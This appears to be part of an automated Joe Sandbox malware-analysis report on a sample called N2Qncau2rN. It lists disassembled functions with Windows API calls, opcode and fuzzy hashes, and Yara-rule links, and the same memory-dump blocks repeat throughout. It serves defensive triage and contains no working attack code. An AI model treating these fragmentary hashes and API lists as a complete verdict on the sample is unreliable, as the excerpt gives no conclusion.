                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 262282135-0
                                                                                                                                                                                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                                                                                                Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                                                                                                Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                                                                                                • SendMessageW.USER32(753E23D0,00001001,00000000,?), ref: 00448E16
                                                                                                                                                                                                                • SendMessageW.USER32(753E23D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                                                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3771399671-0
                                                                                                                                                                                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                                                                                                                Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                                                                                Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                • API String ID: 0-1603158881
                                                                                                                                                                                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                                                                                                Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateMenu.USER32 ref: 00448603
                                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 161812096-4108050209
                                                                                                                                                                                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                                                                                                Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                                                                                                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                                                                                                                Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                                                                                • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                                                                                                                Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 978794511-0
                                                                                                                                                                                                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                                                                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                                                                                                                Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                                                                                                Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                                                                                                Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove$_memcmp
                                                                                                                                                                                                                • String ID: '$\$h
                                                                                                                                                                                                                • API String ID: 2205784470-1303700344
                                                                                                                                                                                                                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                                                                                                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                                                                                                                Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045EC33
